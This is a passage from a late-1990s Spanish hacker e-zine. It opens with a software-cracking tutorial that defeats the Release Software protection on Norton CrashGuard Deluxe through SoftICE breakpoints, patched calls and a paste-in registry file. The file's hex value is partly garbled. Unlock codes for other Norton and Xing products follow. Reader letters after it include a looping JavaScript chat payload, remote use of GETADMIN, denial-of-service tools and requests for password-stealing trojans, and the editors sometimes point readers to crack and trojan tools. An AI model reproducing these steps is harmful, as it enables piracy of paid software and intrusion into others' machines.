  :0040675E 0F84F4010000                  je 00406958
  :00406764 BF34254300                    mov edi, 00432534

        Ummmma. Aqui ya tenemos una bonita direccion de memoria (variable
  global) para usar con Softice.Pero antes aadamos la libreria RSAGNT32.DLL.
  al la lista de dll que sabe manejar el Softice.

        Abrimos el Symbol Loader de Softice y en el menu Edit -> Softice
  Initialization Settings -> Exports aadimos RSAGNT32.DLL. Abrimos el Symbol
  Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce:

  Bpx 406752
  Bpx startSalesAgent

        Pulsamos F5 y cuando aparezca la ventana de  "Welcome to Symantec
  Trialware" pulsamos sobre el boton "Buy Now". Aparecer en el Softice en el
  primer breakpoint Bpx 406752

  Seguimos ejecutando, paramos en la funcion startSalesAgent

  cs:00407834 E807F30000          Call rsagnt32!startSalesAgent   <- Asistente
                                                                     de compra
  cs:00407839 83C408              add esp, 00000008
  cs:0040783C 66833D0425430000    cmp word ptr [00432504], 0000 
  cs:00407844 742B                je 00407871             <- si salta, has
                                                             comprado

        Nopeamos el asistente de compra. Esto es, sustituimos la llamada por
  instrucciones inonfesivas. En : 00407834  90 90 90 90 90

        Si estudiamos je 00407871 y hacemos que no vaya a la direccion 407871
  aparece una ventana contandonos que se ha grabado un archivo llamado
  Rslicens. txt pero esto no hace que se active el proceso de compra, este
  nos es el camino.

        Otra comparacion interesante se encuentra despues de la rutina de
  entrada al bloque

  cs:00406752 E859100000        call 004077B0    <- Bloque anterior
  cs:00406757 66392D04254300    cmp [00432504], bp  <- Comparacion Interesante
  cs:0040675E 0F84F4010000      je 00406958
  cs:00406764 BF34254300        mov edi, 00432534

        Cuando nos encontremos sobre la  direccion cs:0040675E cambiamos el
  flag de cero que estara activada (Z) y la colocamos a desactivada (z).
  Ahora el programa seguira en cs:00406764. Pulsemos F5 y veamos que ocurre.

        Ha aparecido una ventana que nos dice que esperemos mientras nuestro
  programa esta siendo preparado (Please wait while your software is being
  prepared). Al fin, se "PREPARA EL SOFTWARE"

        Nota: Si el proceso anterior se repite muchas veces conviene que
  cerremos todos los programas que tengamos activo e incluso el mismo Norton
  Crashguard que tengamos en la barra de tareas.

        Una vez completado este proceso habremos comprado virtualmente el
  Norton crashguard Deluxe.

        Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y
  CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y
  LICENSE.xxxxxx (numeros de licencia) Este proceso realizado en tiempo real
  con el Softice no trae ningun problema pero a la hora de hacer los parches
  no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO
  TIENE SOLUCION.

  MODIFICANDO EL REGISTRO

        Usaremos una herramienta muy util para los crackers el programa
  Regmonitor (si no lo tienes consiguelo). Observamos unas variables que lee
  el programa (no registrado) al principio y tenemos:

  HKCR\ultxfile\Format\MSHAEZDC\write  /* Esta nos suena */
  HKCR\ultxfile\Format\MSHAEZDC\xlate
  HKCR\ultxfile\Format\MSHAEZDC\open /* Esta nos suena*/

        Bien, basta comparar los valores antes y despues de "preparar" el
  software, para darse cuenta que la unica modificacion la realiza en open.
  Cuando esta registrado su valor es:

  HKEY_CLASSES_ROOT \ultxfile\Format\MSHAEZDC\open
  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00
  08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00

        Esta es la forma en que se comunica al resto de utilidades que la
  compra ya ha tenido exito. Y YA ESTA, basta con introducir este valor en el
  registro para que quede registrado el Norton CrashGuard Deluxe 3.0

        MSHAEZDC corresponde al programa en cuestion a comprar. Usando el
  regmonitor vemos que clave busca el programa a desproteger y anotamos el
  codigo (MSHAEZDC).

        Esta tactica se ha probado con exito con las siguientes aplicaciones
  protegidas por la compaia Release Software Corporation : Norton utilities,
  Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder,

        Creando un archivo de registro ya tenemos hecho un crack no
  destructivo ya que no modifica ningun ejecutable.

----------------------------------- Cortar por aqui --------------------------
REGEDIT4
; (c) ESTADO+PORCINO 1998
; Modificacion de registro para Norton Crash Guard Deluxe
; Mr.Red & otras hierbas
;
[HKEY_CLASSES_ROOT\ultxfile\Format\MSHAEZDC]
"open"=hex:00,00,00,00,00,0
ffb
0,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00
,00,00,00,00,00,00,00,00,00,00

----------------------------------- Cortar por aqui --------------------------

        Para los demas programas que usan esta proteccion tenemos:

  Xing MPEG Encoder       codigo -> MSHVEMAV
  Norton Utilities        codigo -> MSHVEM0E
  Norton Unisntaller      codigo -> MSHW2EHL

        Bueno ha sido largo pero ha merecido la pena.


        MORALEJA: Si quieres poner una puerta, procura que no sea de papel.

        Es el colmo de la incompetencia. Confias la venta de tu producto a un
  empresa que proporciona una proteccion ridicula que no vende tu producto si
  no que practicamente lo regala. Por que no invertir la millonada que
  Symantec habra pagado a Release Software Corporation encontrar a unos
  buenos programadores en ensamblador que hicieran una proteccion decente.
  Ademas, esta compaaa protege y vende productos de mas empresas a parte de
  Symantec. Basta pasarse por su web http://www.releasesoft.com y comprobar
  lo orgullosos que estan de sus clientes. Realmente, no creo que esta
  compaia dure mucho.

        La importancia de este articulo radica en que se ha conseguido
  solventar con exito la proteccion de una casa de Software dedicada a
  proteger y vender. Quedan a nuestros pies cientos de programas, con una
  proteccion de papel, gracias a la incompetencia de una avariciosa compaia.
  Mejor seria que diera los programas gratis, y de dejara de hacer el
  ridiculo.

        Esperamos vuestras opiniones, sugerencias y ensayos en
  estadoporcino@hotmail.com Recordad bebed de la fuente, buscad a +ORC en la
  red.

  Mr_PinK & WKT ( WHISKEY KON TEKILA )
  http://wkt.home.ml.org
  http://wkt.mypage.org

<>

<>

                      /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                          Un poco de cultura: Libros     
                      \----------------------------------/


        Bien, en primer lugar, esta va a ser, digamos, la nueva seccion del 
  e-zine. Aqui, a partir de ahora y en adelante a los siguientes e-zines,
  comentaremos distintos titulos de libros relacionados con el tema, y por 
  supuesto donde podreis encontrarlos y su precio (si es q se sabe :o).

	  Dicho esto, vamos a empezar:

  - Cyberpunk, outlaws and hackers on the computer frontier. Katie Hafner and
    John Markoff. Simon & Shuster, New York 1995.

    Libro de lectura obligada, engloba todos los casos mas conocidos sobre el 
  underground, desde Kevin Mitnick hasta el Hacker de Hannover. De momento 
  este libro solo lo he encontrado en ingles :o(, pero bueno, podeis buscarlo
  en espaol tambien, mirar por su ISBN :0-684-81862-0. Unas 1.500 a 2.000 pts

  - Hackers: Heroes of the computer revolution. Steven Levy. Dell Books, New 
    York, 1994.

    Otro de los grandes libros sobre el tema. Steven Levy es un autor expe-
  rimentado sobre el tema de los ordenadores, este es su tercer libro. Tambi-
  en en ingles, pero como ya dije antes, puedes buscarlo por su ISBN :0-385-
  31210-5. 1.500 pelas.

  - Hacker Crackdown, The: Law and Disorder on the Electronic Frontier. Bruce
    Sterling. Bantman Books, 1993.

    Uno de los libros mas famosos sobre el mundo de los hackers. En este
  libro, el autor examina el pasado, presente y futuro del underground, desde
  sus principios, pasando por MoD y LoD hasta, de nuevo, Mitnick. Otro mas en
  ingles. Su ISBN: 0-553-56370-X.

  - Huevo del Cuco, El. Clifford Stoll, 1990.

    Que decir de uno de los libros mas famosos sobre el underground. Aqui tie-
  nes toda la historia del conocido Hacker de Hannover, toda una autentica
  historia. ISBN: 0-671-72688-9. Sobre las 2.000 pelas.

  - Maximun Security: A Hacker's Guide to protecting your internet site and
    network. Anonymous, SAMS Net, Indianapolis, 1997.

    Este es uno de los libros "tecnicos" mas famosos y utiles q conozco. En es-
  te libro encontraras todo lo necesario para aprender sobre seguridad, desde
  el usuario mas principiante hasta el administrador de un sistema, aqui tie-
  nes absolutamente todas las respuestas a tus preguntas. Libro escrito por
  un hacker ya experimentado. El libro incluye el ultimo manifiesto escrito
  por The Mentor, y una de las mejores citas sobre el autor que he leido hasta
  ahora. La cita dice asi: "El autor de este libro vive felizmente en el sur
  de California, con un Sun SPARCStation, un IBM RS-6000, dos Pentium, varios
  MicroVax, y su mujer" :o), bueno, dejemonos de coas, aqui esta su ISBN:
  1-57521-268-4. Altamente recomendado :o). Un poco carillo, entre 7.500 y
  10.000 ptas. depende el sitio donde lo compres.

  - Masters of Deception: The gang that ruled cyberspace. Michelle Stalla &
    Josua Quitter, Harper Collins, 1995.

    Libro imprescindible si quieres conocer la autentica historia sobre los MoD.
  Este libro se basa en los pasos seguidos por Phiber Optik (aka Mark Abene) y
  sobre sus andanzas por Legion of Doom, 2600 y la fundacion de Masters of
  Deception. Muy Bueno y entretenido. ISBN: 0-060-92694-5. 1.500 ptas.

  - Mundo Digital, Un. Nicholas Negroponte. RandomHouse, 1995.

    Un libro muy entretenido, escrito por un gran autor y gran estudioso de los
  ordenadores y a lo que de tecnologia se refiere. Este libro lo hay en espa-
  ol, lo que no se es la editorial fijo, asin que vuelve a buscar por su ISBN
  0-679-43919-6. Sobre 2.000 pelas.

  - Takedown.Tsutomu Shimomura, John Markoff. Hyperion, 1996.

    Otro de los grandes libros sobre los grandes del Hack, en este caso se
  cuenta como se capturo a Kevin Mitnick. Este libro esta escrito por el autor
  de su captura, muy entretenido. ISBN: 0-786-88913-6. Sobre las 2.000 pelas.

  - UNIX in a Nutshell: A Desktop Quick Reference for Solaris V and 2.0.
    Daniel Gilly. O'Reilly & Associates, 1992.

    Trannnnnnnnquis, aunque parezca que el librito ta un poco anticuado, no pasa
  na, acaba de salir la segunda edicion actualizada para el SVR4. Uno de los
  libros mas famosos para empezar a conocer este sistema operativo. 2.000 ptas.
  ISBN: 1-585-92001-5

  - UNIX Unleashed. Sams Development Team. SAMS Publishing, Indianapolis 1994.

    Acojonante, es la unica palabra que se me ocurre para describir este pedazo
  de libro. Aqui encontraras todo lo que necesites saber del SVR4. Escrito por
  gurus del UNIX. ISBN: 0-672-30402-3. Sobre unas 7.500 a 8.000 ptas.


  Bueno, de momento esto es todo lo que os puedo ofrecer de libros, pero no os
  preocupeis, el proximo e-zine, mas :o).

  mac_crack@usa.net

<>

<>

                             Ŀ
                            <  EL LECTOR OPINA  >
                             

        Otra vez ya estamos con vuestra seccion, pero os pedimos que penseis
  claramente lo que nos escribiis, ya que sige habiendo mucho desaprensivo
  que solo quiere entrar en computadoras ajenas y similares, esto es una
  tonteria, por lo que no hace falta que escribais }:-) Al igual que tampoco
  hace falta que escribas un mail solicitando que os demos clases de hack,
  menuda tonteria. Okis?

        Por otro lado esta seccion esta mejorando, ya que por fin los lectores
  se empiezan a contestar entre ellos, y esto es lo que precisamente
  pretendiamos con esta seccion y nos alegra mucho ;-) y ya basta de rollos
  y que comienze el mail de nuestros fantasticos lectores.
                               
<>
       
  From:  PoP <popup@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  novato...... en IRC soy ^PoP^ :)  

  Hace un mes, mas o menos, me pasaron vuestra web, y me parecio
  bueniiiiiiisima. Estoy leyendo todos los txt, incluidos los e-zines(que es
  muy buena..... sera pq es la primera ke leo :), y ademas es baratita...
  jeje, pero de muchas cosas nomentero...
 
  Es por esto ke os "maileo" para sugerir ke pongais en el e-zine o en
  kualkier otro sitio(kreeme ke lo buskare) un diccionario en el ke vengan
  palabras teknikas ya ke eso ayudaria mucho.
  Estoy komo loko por hacer todo eso de lo ke hablais en el e-zine(mi novia
  dice ke kiero mas a mi PC ke a ella  :)  ) pero veo ke es totalmente
  necesario tener al menos un linux, controlar el lenguaje C y sobre todo
  saber komo se kompila. Bueno el kaso es ke me veo inkapaz de acceder a
  internet por otro S.O. ke no sea el Win95 (o NT ke es lo mismo a mi
  parecer), ya ke intente instalar linux (la version s.u.S.e 5.0 y no me dio
  muy buen resultad( a parte de no entender ni papa) y por eso os pido
  ayuda...
  Me gustaria (si no es mucho pedir) ke me sugirierais ke version de linux
  instalar(tengo la suse 5.1 y la red hat 5.0, aunke kompraria otra si hace
  falta) para poder iniciarme (y algun tipo de informacion sobre los comandos
  de linux). Ya he preguntado por ahi y me ha dicho ke pruebe kon la
  SlackWare... .  Pero sobre todo un libro para aprender lenguaje C y saber
  kompilar, para pardillos komo yo ke empiezan del zero_absoluto( en lo ke a
  lenguaje C se refiere).
  Enga, no os doy mas la tabarra.... solo felicitaros por la pag y por el
  e-zine (sois mu wuenos :) ) y seguid asi! Accedeis a ayudar y es dificil
  enkontrar ayuda sobre hack para los novatos komo yo ke kieren llegar ha ser
  komo vusotros... y olvidar el w95 de una puetera vez!
            Espero vuestro mail y.........     Muxxxxxxxas   Gracias! 

     Atentamente....    Jose Antonio Lopez (Murcia) 

  <------>

  [ Thx, Hombre lo referente a las versiones linux eso depende un poco de
   tus gustos, por ejemplo:

    - Red Hat or SuSe = Facil de instalar y mantener.
    - Slackware = Muy buena.
    - Debian = Enfocada a los programadores.

    Nuestro consejo es que empiezes con RH 5.0 o SuSe que son faciles y
    despues pruebes con Slackware o Debian. Como dices bien en tu mail es
    aconsejable que pilles algun libro sobre Linux y C. ]

<>

  Date: Fri, 24 Apr 1998 19:52:41 -0700 (PDT)
  From: hardbody@xxxxxxxxxxxxxx
  Subject: help

  Seor Conde Vampiro

  Por favor, ayudeme, yo lo que mas quiero en la vida es ser hacker, me
  fascina la idea de entrar a otro computador sin que este se de cuenta,
  estoy en segundo semestre de Ingenieria de Sistemas y tengo 17 aos.

  Por favor, envieme su respuesta lo mas pronto posible.

  Atte Zeus 

  <------>

  [ Pues con esa filosofia que tienes no llegaras muy lejos que digamos,
    ya que el hacking no consiste en entrar en computadoras ajenas y
    que el dueo no se de cuenta. Haver si lees este ezine con mas
    claridad. ]

<>

  Date:  Sun, 26 Apr 1998 17:04:13 GMT  
  From:  "Ferran Fontcuberta ( Vs )" <versus@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Pos vaya ;-)  
 
  Pues... una sugerencia, podrias comprimir la revista en zip o gz o... ya 
  que okupa menos y se tarda menos en bajar (aunke tengan el mismo tamao) 

  Tanxs. 

  Vs 
  versus@xxxxxxxxxxxxxx 
  com 

  <------>

  [ No me digas!!, pero como ya hemos dicho en alguna ocasion no queremos
    comprimirla ya que asi es llegar y leer. ]

<>
 
  Date:  Thu, 30 Apr 1998 12:24:38 GMT  
  From:  "Francisco Rodriguez Casal (Pac\4s)" <pacs@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Copiar diskettes  

  Hola: 

  Os queria pedir ayuda. 

  Quiero copiar un diskette que esta protegido contra copia. Se trata de 
  un programa reciente que incluye un diskette llave (ellos le llaman 
  TOKEN) creo que la proteccion consiste en un error de sector 
  intencionado en la pista 28 cara 1 el cual no es reproducido en el disco 
  destino pot los copiones. 

  He intentado copiar el diskette con varios copiones y no lo he 
  conseguido. Tampoco controlo mucho del tema. 

  Por supuesto, no pretendo piratear ningun programa, lo que intento es 
  hacer una copia de seguridad de dicho disquete ya que si se daa pierdo 
  la licencia. ;-) 

  Gracias. 

  Un saludo. 

  __________________________________________________________ 
  Universidad de La Corua
  Servicios Informaticos de Gestion 

  Francisco Rodriguez Casal 
  Email: pacs@xxxxxxxxxxxxxx 
  __________________________________________________________ 

  <------>

  [ Un buen copion deberia ser capaz de copiarlo, por lo que deberias seguir
    buscando alguno que satisfaga tus necesidades. Ademas siempre puedes
    aplicar "coding rulez" o sea que como crees saber donde esta la proteccion
    la puedes intentar anular. Pasate por la seccion de crack, para pillar
    tools para este trabajo. ]

<>

  Date:  Sat, 02 May 1998 10:27:38 GMT  
  From:  <ardarj@xxxxxxxxxxxxxx>      
  Subject:  CONSULTA  
 
  HOLA J.J.F. SOY FEAR, SUPONGO QUE NO SABEIS QUIEN SOY (SEGURO QUE NO).
  BUENO, OS PODRIA DECIR QUE SOY UN USUARIO DE INTERNET A QUIEN LE GUSTARIA
  APRENDER A SER UN HACKER, NO SE SI ESO ES POSIBLE ASI COMO YO LO ESTOY
  PLANTEANDO, PERO ESPERO QUE PODAIS AYUDARME, DANDOME CONSEJOS Y
  EXPLICANDOME LAS COSAS QUE DEBO DE HACER, ME REFIERO A QUE VOSOTROS
  SEREAIS MIS PROFESORES Y YO VUESTRO FIEL ALUMNO. SEGURO QUE RECIBIREIS
  CIENTOS DE MAIL'S COMO ESTE, PERO YO OS JURO SI ME ENSAAIS, VAIS A PODER
  ESTAR ORGULLOSOS DE MI.
  DE TODAS FORMAS, ME GUSTARIA FELICITAROS POR LA GRAN PAGINA QUE TENEIS,
  SEGURO QUE SIRVE DE AYUDA A MUCHAS PERSONAS Y POR ULTIMO ME GUSTARIA QUE
  AUNQUE PASAEIS DE MI ME ACLARARAIS UNA DUDA:
 
  - EN VUESTRA PAGINA HAY UN APARTADO QUE EXPLICA COMO BLOQUEAR UN ORDENADOR
  A TRAVES DE UN CHAT. YO LO INTENTE HACER DE ESTA FORMA:
       1.- ME CONECE AL BUSCADOR OLE.
       2.- LE DI AL APARTADO DE CHAT'S.
       3.- ESCOGI EL APARTADO "DIVERSION"
       4.- ESCOGI EN CANAL "AMOR"
       5.- UNA VEZ DENTRO, HABRO EL CANAL PRIVADO DE OTRO USUARIO.
       6.- HABLE UN POCO CON EL Y CUANDO PAS DE MI, ESCRIBI LO QUE
           VOSOTROS DECIAIS QUE HABIA QUE ESCRIBIR O SEA ESTO 

      <script language=javascript>for(i=1;i<2;) { alert("lo siento tenia que
      probarlo con alguien")}</script>

       7.- LE DI AL INTRO Y.... NO PAS ABSOLUTAMENTE NADA, TODO LO QUE
           HABIA ESCRITO APARECI EN EL CANAL PRIVADO, Y EL TIO ME  
           PREGUNTO QUE PORQUE HABIA PUESTO ESO. 
 
  BUENO ME GUSTARIA QUE SI PODEIS Y QUEREIS ME DIJERAIS QUE ES LO QUE HE
  HECHO MAL, O LO QUE NO HE HECHO. GRACIAS.
 
  EMAIL=  ardarj@xxxxxxxxxxxxxx
 
  <------>

  [ Como ya hemos dicho, no damos clases privadas ni nada por el estilo.
    Nuestro consejo que es estudies mucho todo lo que puedas. Parece que hay
    alguna web que ensean a escribirnos solicitando clases porque todos
    escribiis lo mismo!!!!.
    Si hubieras leido el txt con mas cuidado, verias que pone que no siempre
    funciona debido al CGI de los Web Chat, por eso antes de ejecutar el
    script, escribe '<' para saber si funciona o no. Lo mas aconsejable es
    volverse a leer la guia. ]

<>
      
  From:  <quasar@xxxxxxxxxxxxxx>      
  To:  mack_crack@usa.net  
  Subject:  [JAU....]  
 
  Hola loco.... 
 
  La verdad es ke iba a encriptarlo con pgp pero para decir esta tonteria 
  paso.... 
  
  Solamente era para decirte ke tu geb es una de las ke hay ke ir 
  viniendo cada x tiempo para ver las novedades y tal y pascual....por lo 
  ke en mi opinion, una mas, deberia ser muy dinamica y ligera y asi 
  daaria gusto en venir...bla bla bla y mas bla.... 
  
  Resumiendo mucho ke no tengo ganas de enrollarme: el contenido de la 
  geb...muy OK 
  pero macho......DESCARGALA DE JAVA KE SE HACE ETERNO!!!.... 
  
  A lo mejor un poco directo pero claro.....ok?... 
  
  por cierto, a ver si podeis re-editar el articulo de Nobody sobre el 
  netstat y nbtstat ke la pea me pregunta siempre lo mismo y asi, en vez 
  de enrollarme, le paso el articulo ese...os lo digo a vosotros porke 
  creo ke teneis contacto....ok? 
  
  y ya os enviare algo un dia ke tenga un minimo de ganas ...... 
  
  cuidaros y no cerreis los dos ojos al dormir.....;) 
  
  contestad en: 
  
  quasarr@xxxxxxxxxxxxxx
  
  ostias no he utilizao el remailer...psss...da igual...lo dicho.... 
  
  QuasaR .......... progressing 
  
  ressing 
  
  <------>

  [ Hi

  Pues si, nuestras webs son de las q cada POCO tiempo se actualizan con mas 
  ficheros, links y si, tb java. Ya se q se hace eterno, pero si te has leido
  la segunda pantalla de nuestra web pone entrada CON JAVA y entrada SIN JAVA,
  o sea q en lo referente a tu consejo de descargarla de java, mmmm, paso, ya
  he tenido q hacer dos entradas, coje la q mas te convenga ;-). En lo
  refererente al articulo de Nobody, ya le mandaremos un mail a ver q dice. 
  Byezz ]

<>

  From:  "Dany" <kawa.saki@xxxxxxxxxxxxxx>      
  Subject:  Win NT  
 
  Hola,
 
  Estoy buscando Caballos de Troya.
  Tanto el codigo ( Para Vbasic o Pascal ) como los programas ya hechos. Es
  para Win NT, para tomar las claves. Alguna Sugerencia???
 
  Dany,
 
  CodeBracker en el IRC Hispano 

  <------>

  [ Pues de eso alguna cosa hay, lo mejor que puedes hacer es visitar alguna
    web sobre Hack NT y ya pillaras tools. Para Vbasic si que hemos visto
    pero en pacal nop. Pillate el winsock caballo de troya. ]

<>
 
  Date:  Wed, 06 May 1998 09:25:01 GMT  
  From:  "Sanye" <sanye@xxxxxxxxxxxxxx>      
  Subject:  hackers JJf Hackers  
 
  me gustaria recibir informacion sobre los programas y pasos que tendria
  que seguir para acceder a sistemas remotos como los ordenadores de mi
  amigos por ejemplo, o servidores de red de empresas o cosas asin Te pido
  ayuda ya que seguro que tu sabes cuales son los programas y tambien los
  pasos a seguir.
 
  ea3ckx@xxxxxxxxxxxxxx

  <------>

  [ hhuummmm, creo que para eso esta este ezine o sea que lee. ]

<>
 
  Date:  Mon, 11 May 1998 10:47:55 GMT  
  From:  chipiona <chipiona@xxxxxxxxxxxxxx>      
  To:  "'silicio@xxxxxxxxxxxxxx"  
  Cc:  "'zen@xxxxxxxxxxxxxx"  
  Subject:  SOLICITO_AYUDA, POR_FAVOR  
 
  Imploro a quien me pueda ayudar, que me eche un cble en esto. 
  Ya se que como indicais en vuestras paginas la mayoria de vosotros, esto es
  ilegal y solo lo mostrais a efectos educativos, y bajo la responsabilidad
  del que lo acepte. YO ACEPTO ESA RESPONSABILIDAD. 
  Os explicare el problema. Tengo una serie de programas demo de gestion de 
  clinica veterinaria. Todos estan limitados de alguna forma, la mayoria de
  llos en la cantidad de clientes que les puedo meter (maximo de 25 clientes),
  y otro que esta limitado por la fecha (1/4/98, que ya tengo controlada
  mediante el DATE CRACKER), pero tambien esta limitada la base de datos
  indicandome cuando craqueo la fecha que no puede aceptar el registro porque
  es superior a los seis meses de evaluacion. 
  Hay alguna forma o programa que me podais indicar para eliminar estas 
  limitaciones?. Conque me funcione uno de los programas me avio. 

  Mi nombre es Jose Javier y mi direccion de correo es como veis 
  CHIPIONA@xxxxxxxxxxxxxx y no os asusteis del nombre porque es el correo
  de la oficina donde curro. 

  GRACIAS A TODOSS 

  <------>

  [ Hombre, para empezar son programas demos y esta muy mal por tu parte
    que los uses para obtener beneficio economico, como estas haciendo. 
    Lo mejor que puedes hacer para crackearlos, es buscar algun crack
    especifico para el programa en cuestion. Pasa por nuestra seccion de
    crack para pillar alguna tool. ]

<>
 
  Date:  Thu, 07 May 1998 05:13:14 GMT  
  From:  Marco Demonte <mdemonte@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  mmmm.. pena  
 
  Sr. Vampiro ;-) 

  Se que el tiempo que ocupara en leer esto es tiemo perdido pero no hay 
  otra manera para aprender..... 

  Como se comienza a crackear.. algun documento para empezar o algo 
  asi.. Ya que estoy interesado en eso por que tengo una lista ... 

  Le comento que soy de Mexico y hace un par de aos estuve estudiando 
  mucho respecto al phreaking , aqui en Mexico rompiamos con 2600hz y 
  utilizaba protocolo ccitt r2 por lada 800 nacional, era una maravilla, 
  tambien con 2600hz para lada 800 internacional y tambein funcionaba.... 
  Si te interesa podria pasarte algunos tips que en otros paises podrian 
  funionar como la intervencion de llamadas en sistemas ccirr r2.. 
 
  Tambien se algo de cululares.... 
 
  Mil gracias por tu tiempo 

  Marco 

  <------>

  [ A que esperas!!!! envia los trucos al ezine ;-) y ya sabes escribe algun
    articulo de phreak. Para crackear hay varios documentos de como comenzar.
    Pasate por nuestro web ya que alguno hay disponible. ]

<>
 
  Date:  Tue, 12 May 1998 17:40:37 GMT  
  From:  Anonimo <prophet@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  {CyBoRg}, SHG  
 
  Hola a todos me parece cojonuda vuestra revista, escribo este mail 
  para contestar un mail que lei sobre una que decia que querias cosas 
  de NT, y que el GETADMIN no funciona remotamente. Bueno lo primero, el 
  getadmin funciona remotamente y lo he probado y va, porque no pruebas 
  hacer lo siguiente desde MS.DOS: 

  GETADMIN \\ip\nombre usuario 

  No se habra ocurrido utilizar el getadmin con el usuario invitado porque 
  no va con ese usuario. 

  Cosas de hack de NT, nunca se te ha ocurrido explorar los recursos 
  compartidos de NT que trae ocultos,, ah pero eso no lo sabiais, :))))). 
  Hay una buena utilidad por ahi que se llama NAT que os ayudara para el 
  NBTSTAT famoso, ya que le podreis poner un dicionario y lo pasa. Que mas 
  utilizar el l0pth, va genial si no tiene instalado el SP3. Hay muchas 
  cosillas. 

  Bueno otro asunto comentaba de hacer taeardrop, land, etc en windows, 
  pues gente es posible hacerlo, hay un sitio que tiene el programilla. 

  *****Censurad la url si quereis ****** 
  www.aggressor.net 

  Bueno gente me despido y o quiero dar mas la tabarra. Hasta otra. Por 
  cierto cuando metamos los 30 megas de nuestra web, pondremos un link a 
  vuestro zine, 

  Ad10, bye 

  ++++++++++++++++ 
  {CyBoRg} 
  SHG..... 
  ++++++++++++++++ 

  <------>

  [ Por fin, los propios lectores se contestan entre si :)))
    Okis, ya nos pasaras el url del grupo y nosotros tb os pondremos un
    link. 
    Thx's por los cumplidos y nos gusta que otros grupos nos saluden, ya
    sabeis que podeis escribir algun arti, estaremos encantados de
    publicarlo. Saludos de - J.J.F. / HACKERS TEAM - ]

<>
 
  From:  "Fco. de Angel Fernandez-Pacheco" <fdeangel@xxxxxxxxxxxxxx>      
  Subject:  Re: E-Zine  
 
  Hola!!!
  Lo primero es felcitasros por el E-Zine que esta muy guapo, luego otra
  cosa es si puedo colaborar en traducciones de textos en vuestra pagina.
  Sludos.
 
  DataCrack 

  <------>

  [ Pues ya sabes, traduce lo que quieras y lo envias al buzon y lo pondremos
    en el ezine :), la gente nos pide traducciones de articulos de pkreak,
    o sea que ya te hemos dado trabajillo.
    Esta genial que querais colaborar, cuantos mas, mejor para todos. ]

<>
 
  Date:  Thu, 14 May 1998 03:00:02 GMT  
  From:  Ayala <ayala@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  (sin asunto)  
 
  hola, estoy buscando a un maestro, alguien que pueda iniciarme 
  en la entrada a sistemas informaticos. Si puedes ayudarme, hazmelo 
  saber, gracias. 

  <------>

  [ Ya estamos como siempre!!, que no ayudamos a la gente para que entre
    en los sistemas ajenos y tampoco damos clases privadas, okis ? ]

<>

  Date:  Wed, 20 May 1998 02:37:32 GMT  
  From:  "Arturo Villal\sn Villa" <avillalo@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Problemas con algunas de sus secciones  
 
  Tengo problemas al intentar bajar algunos de los archivos de su pagina 
  estos son: 
  Seccisn HACK Novell (no se puede obtener ninguna utileria) 
  Utilidades de Encripcisn (no se puede obtener ninguna utileria) 
  Utilidades Network-Hacking (no se puede obtener ninguna utileria) 

  ? Que es lo que esta pasando en sus servidores o cual es la razsn de 
  este problema ? 

  ? Tienen una direccisn FTP para obtener mas rapidamente estas utilerias 
  asm como los archivos de Virus Informaticos, de ser asm, podrman darme 
  la direccisn para tomarlos ? 

  Saludos 

  <------>

  [ Es normal que siempre haya algun enlace que no este disponible, ya que el
    web es muy dinamico, ademas que algunas de esas secciones que mencionas
    hay un MENSAJE QUE PONE QUE DE MOMENTO ESTA OFF-LINE , pero en fin ...
    Las razones son muy variadas, por desgracia, pero procuramos estar siempre
    con lo mejor y mas actualizado ;-) Sobre virus tienes la seccion de
    virus que seguro te gustara. ]

<>

  Date:  Wed, 20 May 1998 07:34:44 GMT
  From:  "David Gallego Laredo" <dgall@xxxxxxxxxxxxxx>      
  Subject:  listado unfrateful.java  
 
  EN PRIMER LUGAR ME GUSTARIA FELICITAROS POR VUESTRO E-ZINE, ES EL MEJOR QUE 
  HE LEIDO HASTA EL MOMENTO EN CASTELLANO, SOY UN AFICIONADO AL HACK Y 
  DESEARIA COMENTAROS UN PROBLEMA QUE ME HA SURGIDO CON UNO DE LOS LISTADOS 
  EN JAVA PUBLICADOS EN VUESTRO CUARTO E-ZINE. EN CONCRETO SE TRATA DEL 
  "UNGRATEFUL.JAVA" EN EL CUAL MEDA UN ERROR AL COMPILARLO CON EL VISUAL J++ 
  1.1. 

  EL ERROR ES EN LA INSTRUCCION: 
  ErrorMessage err = new ErrorMessage(); 

  ME DICE QUE NO HE DEFINIDO LA CLASE ErrorMessage. 
  NO SE NADA DE JAVA DE MOMENTO, Y ESPERO ME PODAIS HECHAR UNA MANO PARA QUE 
  ESTE PROGRAMA FUNCIONE Y PODER PROBARLO Y ESPERIMENTAR UN POCO CON EL. 

  ESPERO NOTICIAS VUESTRAS, GRACIAS Y HASTA OTRA. 

  <------>

  [ Pues definela ;-) por ejemplo, pero lo mejor es que pilles algun libro o
    busques algun curso de Java por la Red, que te pueda ayudar.
    Thx por los cumplidos :) ]

<>
 
  Date:  Sat, 23 May 1998 23:43:47 GMT  
  From:  Edgardo Mayer <horizonte@xxxxxxxxxxxxxx>      
  Subject:  INFO  
 
  Podrmas darme direcciones de E-mail de colegas-hackers argentinos. 
  Busco sean argentinos por la parte de la telefonma se 
  refiere(phreakers). 

  Gracias y ixitos 

  Edgardo 

  <------>

  [ Pues nosotros no conocemos ningun phreaker o hacker argentino, pero
    si alguien lo es, que nos envie un mail y os pondremos en contacto,
    okis ? ;-) ]

<>

  From:  "raul diaz" <rul_diaz@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  Saludos...!!!  
 
  Antes que nada los felicito por su pagina, son muy interesantes los 
  temas que ahi describen... 

  f e l i c i d a d e s . . . ! ! ! 

